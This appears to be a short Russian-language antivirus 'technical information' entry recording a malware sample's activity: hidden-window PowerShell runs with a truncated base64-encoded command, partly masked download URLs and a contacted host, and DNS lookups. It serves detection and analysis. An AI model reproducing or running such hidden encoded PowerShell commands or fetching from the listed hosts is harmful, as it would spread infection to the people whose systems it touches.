Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG8AbgBsAGYAbQB4AGYAZwBsAGcAPQAnAFgAeQB5AHMAbgBrAGkAdQB5AHgAbwAnADsAJABFAGMAegBhAGQAeAB2AGUAYwAgAD0AIAAnADIAOQA2ACcAOwAkAFoAegByAHIAegBlAGIAeQBzAGUAPQAnAFYAcAB5AGIAeAB4AHAAbQB...
- 'mo###aftom.com':80
- http://ad####niawan.com/mp3/18ox6h/
- http://www.mj####anical.com/wp-includes/ddy/
- DNS ASK ad####niawan.com
- DNS ASK my####thanhbinh.net
- DNS ASK sf##c.biz
- DNS ASK mj####anical.com
- DNS ASK mo###aftom.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG8AbgBsAGYAbQB4AGYAZwBsAGcAPQAnAFgAeQB5AHMAbgBrAGkAdQB5AHgAbwAnADsAJABFAGMAegBhAGQAeAB2AGUAYwAgAD0AIAAnADIAOQA2ACcAOwAkAFoAegByAHIAegBlAGIAeQBzAGUAPQAnAFYAcAB5AGIAeAB4AHAAbQB...' (со скрытым окном)